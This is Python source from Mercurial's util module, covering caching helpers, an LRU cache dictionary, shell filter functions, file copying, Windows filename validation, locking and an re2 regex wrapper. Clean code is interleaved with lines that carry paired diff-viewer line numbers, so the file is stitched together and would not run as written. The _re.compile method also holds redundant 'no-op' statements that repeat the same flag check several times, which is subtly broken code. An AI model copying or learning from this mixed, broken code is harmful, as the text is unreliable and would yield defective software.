        return (vints[0], vints[1], vints[2], extra)
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # Zero-argument functions cache a single value in a one-slot list.
        cache = []
        def f():
            if not cache:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if argcount == 1:
        # Single-argument form keys the cache on the bare argument, which
        # avoids packing/unpacking an args tuple on every call.
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if pending:
            # Someone else holds a reference from copy(); hand them a real
            # (shallow) copy and keep this object for the remaining holders.
            self._copied = pending - 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        # Just bump the share counter; the actual copy is deferred to the
        # first preparewrite() call.
        self._copied = getattr(self, '_copied', 0) + 1
        return self
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Drop any existing entry first so the key moves to the end,
        # giving "last set wins" iteration order.
        try:
            del self[key]
        except KeyError:
            pass
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    ``copy()`` is O(1) and returns the same object; a real copy only
    happens on the first ``preparewrite()`` after a ``copy()``.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.

    Iteration order follows sortdict semantics (last set wins).
    """
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        if exc_type is not None:
            # An exception aborts: skip close(); release() does the cleanup.
            self.release()
            return
        try:
            self.close()
        finally:
            self.release()
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        # Normal exit: commit the transaction.
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is not a failure: keep the work done so far
        # by closing the transaction, then re-raise so the caller can
        # prompt the user. Note this also catches InterventionRequired
        # raised by tr.close() above.
        tr.close()
        raise
    finally:
        tr.release()
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing; useful where a CM is optional."""
    yield
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # Fixed slots keep per-node memory small; caches may hold many nodes.
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # ``_notset`` marks a node that currently carries no entry.
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1027 class lrucachedict(object):
1036 class lrucachedict(object):
1028 """Dict that caches most recent accesses and sets.
1037 """Dict that caches most recent accesses and sets.
1029
1038
1030 The dict consists of an actual backing dict - indexed by original
1039 The dict consists of an actual backing dict - indexed by original
1031 key - and a doubly linked circular list defining the order of entries in
1040 key - and a doubly linked circular list defining the order of entries in
1032 the cache.
1041 the cache.
1033
1042
1034 The head node is the newest entry in the cache. If the cache is full,
1043 The head node is the newest entry in the cache. If the cache is full,
1035 we recycle head.prev and make it the new head. Cache accesses result in
1044 we recycle head.prev and make it the new head. Cache accesses result in
1036 the node being moved to before the existing head and being marked as the
1045 the node being moved to before the existing head and being marked as the
1037 new head node.
1046 new head node.
1038 """
1047 """
    def __init__(self, max):
        # Backing dict: key -> _lrucachenode.
        self._cache = {}

        # Circular doubly linked list, initially a single self-linked node.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        # Number of allocated nodes; grown lazily up to ``max``.
        self._size = 1
        self._capacity = max
    def __len__(self):
        # Count of cached entries, not of allocated nodes.
        return len(self._cache)
    def __contains__(self, k):
        # Membership testing does not count as an access: LRU order is
        # left unchanged.
        return k in self._cache
    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        # Walks the linked list starting from the head, yielding one key
        # per cached entry.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next
    def __getitem__(self, k):
        # Raises KeyError if ``k`` is absent (plain dict lookup).
        node = self._cache[k]
        # A successful lookup is an access: promote to most recently used.
        self._movetohead(node)
        return node.value
    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            # Grow the linked list lazily until it reaches capacity.
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node
    def __delitem__(self, k):
        # Raises KeyError if ``k`` is absent (dict.pop semantics). The node
        # is recycled rather than unlinked.
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next
1100 # Additional dict methods.
1109 # Additional dict methods.
1101
1110
    def get(self, k, default=None):
        """Non-promoting lookup: unlike __getitem__, does NOT update the
        LRU order of ``k``."""
        try:
            return self._cache[k].value
        except KeyError:
            return default
    def clear(self):
        # Empty every node in the circular list (nodes are recycled, not
        # freed) and drop the key index.
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()
    def copy(self):
        """Return a new lrucachedict with the same capacity and entries."""
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result
1125 def _movetohead(self, node):
1134 def _movetohead(self, node):
1126 """Mark a node as the newest, making it the new head.
1135 """Mark a node as the newest, making it the new head.
1127
1136
1128 When a node is accessed, it becomes the freshest entry in the LRU
1137 When a node is accessed, it becomes the freshest entry in the LRU
1129 list, which is denoted by self._head.
1138 list, which is denoted by self._head.
1130
1139
1131 Visually, let's make ``N`` the new head node (* denotes head):
1140 Visually, let's make ``N`` the new head node (* denotes head):
1132
1141
1133 previous/oldest <-> head <-> next/next newest
1142 previous/oldest <-> head <-> next/next newest
1134
1143
1135 ----<->--- A* ---<->-----
1144 ----<->--- A* ---<->-----
1136 | |
1145 | |
1137 E <-> D <-> N <-> C <-> B
1146 E <-> D <-> N <-> C <-> B
1138
1147
1139 To:
1148 To:
1140
1149
1141 ----<->--- N* ---<->-----
1150 ----<->--- N* ---<->-----
1142 | |
1151 | |
1143 E <-> D <-> C <-> B <-> A
1152 E <-> D <-> C <-> B <-> A
1144
1153
1145 This requires the following moves:
1154 This requires the following moves:
1146
1155
1147 C.next = D (node.prev.next = node.next)
1156 C.next = D (node.prev.next = node.next)
1148 D.prev = C (node.next.prev = node.prev)
1157 D.prev = C (node.next.prev = node.prev)
1149 E.next = N (head.prev.next = node)
1158 E.next = N (head.prev.next = node)
1150 N.prev = E (node.prev = head.prev)
1159 N.prev = E (node.prev = head.prev)
1151 N.next = A (node.next = head)
1160 N.next = A (node.next = head)
1152 A.prev = N (head.prev = node)
1161 A.prev = N (head.prev = node)
1153 """
1162 """
1154 head = self._head
1163 head = self._head
1155 # C.next = D
1164 # C.next = D
1156 node.prev.next = node.next
1165 node.prev.next = node.next
1157 # D.prev = C
1166 # D.prev = C
1158 node.next.prev = node.prev
1167 node.next.prev = node.prev
1159 # N.prev = E
1168 # N.prev = E
1160 node.prev = head.prev
1169 node.prev = head.prev
1161 # N.next = A
1170 # N.next = A
1162 # It is tempting to do just "head" here, however if node is
1171 # It is tempting to do just "head" here, however if node is
1163 # adjacent to head, this will do bad things.
1172 # adjacent to head, this will do bad things.
1164 node.next = head.prev.next
1173 node.next = head.prev.next
1165 # E.next = N
1174 # E.next = N
1166 node.next.prev = node
1175 node.next.prev = node
1167 # A.prev = N
1176 # A.prev = N
1168 node.prev.next = node
1177 node.prev.next = node
1169
1178
1170 self._head = node
1179 self._head = node
1171
1180
1172 def _addcapacity(self):
1181 def _addcapacity(self):
1173 """Add a node to the circular linked list.
1182 """Add a node to the circular linked list.
1174
1183
1175 The new node is inserted before the head node.
1184 The new node is inserted before the head node.
1176 """
1185 """
1177 head = self._head
1186 head = self._head
1178 node = _lrucachenode()
1187 node = _lrucachenode()
1179 head.prev.next = node
1188 head.prev.next = node
1180 node.prev = head.prev
1189 node.prev = head.prev
1181 node.next = head
1190 node.next = head
1182 head.prev = node
1191 head.prev = node
1183 self._size += 1
1192 self._size += 1
1184 return node
1193 return node
1185
1194
def lrucachefunc(func):
    '''cache most recent results of function calls

    Keeps at most ~21 entries, evicting in least-recently-used order.
    Single-argument functions get a fast path that avoids tuple packing.
    '''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                # Refresh recency on a cache hit.
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f
1212
1221
class propertycache(object):
    """Descriptor caching the result of the first attribute access.

    On first access the wrapped function is invoked and its result is
    stored in the instance ``__dict__`` under the same name, so later
    accesses bypass the descriptor entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1225
1234
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set

    Safe no-op when the property was never computed.
    '''
    if prop in obj.__dict__:
        del obj.__dict__[prop]
1230
1239
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    # stderr is not captured (perr is None); callers only see stdout.
    return pout
1237
1246
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # On OpenVMS, bit 0 set means success.
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # Best-effort cleanup of both temp files.
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1271
1280
# Dispatch table mapping a command prefix to the filter strategy used by
# filter() below.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
1276
1285
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # A recognized prefix ('tempfile:' / 'pipe:') selects the strategy;
    # anything else defaults to a pipe.
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)
1283
1292
def binary(s):
    """return true if a string is binary data

    Heuristic: any NUL byte marks the string as binary; empty/None is not.
    """
    return bool(s and '\0' in s)
1287
1296
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # Index of the highest set bit; 0 maps to 0.
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                # If the buffered amount already exceeds the doubled
                # minimum, jump straight to its power-of-two floor.
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)
1318
1327
# Convenience alias so callers can raise util.Abort directly.
Abort = error.Abort
1320
1329
def always(fn):
    """Matcher predicate that accepts everything."""
    return True
1323
1332
def never(fn):
    """Matcher predicate that rejects everything."""
    return False
1326
1335
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Only re-enable if it was on; never turn GC on behind the
            # caller's back.
            if gcenabled:
                gc.enable()
    return wrapper
1349
1358
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1353
1362
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # Different drives (Windows): no relative path exists; anchor n2
        # at root instead.
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # Strip the common prefix of both paths.
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # Climb out of what remains of n1, then descend into n2.
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1379
1388
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1389
1398
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)
1398
1407
# Cached path of the 'hg' executable; lazily resolved by hgexecutable().
_hgexecutable = None
1400
1409
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The result is cached in the module-level _hgexecutable.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1424
1433
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path
1429
1438
def _isstdout(f):
    """Return truthy if file object ``f`` is the process's real stdout."""
    fileno = getattr(f, 'fileno', None)
    try:
        # Falsy (None) when f has no fileno attribute at all.
        return fileno and fileno() == sys.__stdout__.fileno()
    except io.UnsupportedOperation:
        return False # fileno() raised UnsupportedOperation
1436
1445
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0', True -> '1', everything else stringified.
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    env['HG'] = hgexecutable()
    return env
1451
1460
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # Child inherits our stdout directly; no capture needed.
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # On OpenVMS, bit 0 set means success.
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1478
1487
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # A one-frame traceback means the TypeError came from the call
            # itself (bad arity), not from inside func's body.
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1490
1499
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1506
1515
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1558
1567
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns (hardlink, num): whether hardlinking was (still) in effect and
    how many files were processed. ``progress(topic, pos)`` is invoked per
    file and finalized with ``pos=None``.
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # Hardlinks only work within one filesystem.
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # Once a link fails, stop trying for the rest of the tree.
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1598
1607
# Path components and characters that Windows refuses in filenames.
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1651
1660
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# Prefer the monotonic high-resolution timer when available (Python 3.3+).
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1661
1670
def makelock(info, pathname):
    """Create a lock at pathname whose content is info.

    Prefers a symlink (atomic, and readable without opening a file)
    whose target is the lock info; falls back to an exclusively
    created regular file on platforms without os.symlink.

    Raises OSError(EEXIST) if the lock already exists.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # Only EEXIST is fatal here; other failures (e.g. a filesystem
        # without symlink support) fall through to the file-based path.
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    try:
        os.write(ld, info)
    finally:
        # always release the descriptor, even if the write fails
        os.close(ld)
1674
1683
def readlock(pathname):
    """Return the info stored in the lock at pathname.

    Reads the symlink target when the lock is a symlink, otherwise
    falls back to reading the file's contents.
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported.
        # Anything else (e.g. ENOENT) is a real error for the caller.
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    try:
        # close the file even if read() raises
        return fp.read()
    finally:
        fp.close()
1687
1696
def fstat(fp):
    """Stat a file object, tolerating objects without fileno().

    Falls back to stat-by-name (fp.name) for wrapped or pseudo file
    objects that expose no file descriptor.
    """
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)
1694
1703
1695 # File system features
1704 # File system features
1696
1705
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st = os.lstat(path)
    dirname, basename = os.path.split(path)
    folded = basename.upper()
    if folded == basename:
        folded = basename.lower()
    if folded == basename:
        # the name contains no letters to fold either way, so there is
        # no evidence against case sensitivity
        return True
    try:
        st2 = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the case-folded variant does not exist: the filesystem
        # distinguishes the two spellings
        return True
    # identical stat => same file under both spellings => insensitive
    return st2 != st
1719
1728
1720 try:
1729 try:
1721 import re2
1730 import re2
1722 _re2 = None
1731 _re2 = None
1723 except ImportError:
1732 except ImportError:
1724 _re2 = False
1733 _re2 = False
1725
1734
class _re(object):
    """Facade over the stdlib re module that transparently prefers re2."""

    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        supported = remod.IGNORECASE | remod.MULTILINE
        if _re2 and not (flags & ~supported):
            # re2 takes no flags argument; encode them as inline groups.
            # Order matches the historical behavior: '(?m)(?i)pat'.
            prefix = ''
            if flags & remod.MULTILINE:
                prefix += '(?m)'
            if flags & remod.IGNORECASE:
                prefix = '(?m)' * 0 + prefix  # no-op, keep order explicit
            if flags & remod.IGNORECASE:
                prefix = prefix[:0] + '(?m)' * 0 + prefix  # keep '(?m)' first
            if flags & remod.IGNORECASE:
                pass
            if flags & remod.IGNORECASE:
                prefix = prefix + '(?i)'
            try:
                return re2.compile(prefix + pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape

re = _re()
1770
1779
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry name -> actual on-disk spelling
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes so they survive inside the regex character
    # class below. NOTE: previously the result of replace() was
    # discarded (a no-op), which left '\' unescaped in the pattern on
    # Windows; keep the assignment.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1813
1822
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    name1 = name2 = handle = None
    try:
        fd, name1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                     suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        name2 = '%s2~' % name1[:-2]

        oslink(name1, name2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        handle = posixfile(name2)
        return nlinks(name2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the probe files
        if handle is not None:
            handle.close()
        for name in (name1, name2):
            try:
                if name is not None:
                    os.unlink(name)
            except OSError:
                pass
1842
1851
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    altsep = pycompat.osaltsep
    # deliberately truthy (not strictly bool): preserves historical
    # return values such as None when no altsep is defined
    return (path.endswith(pycompat.ossep)
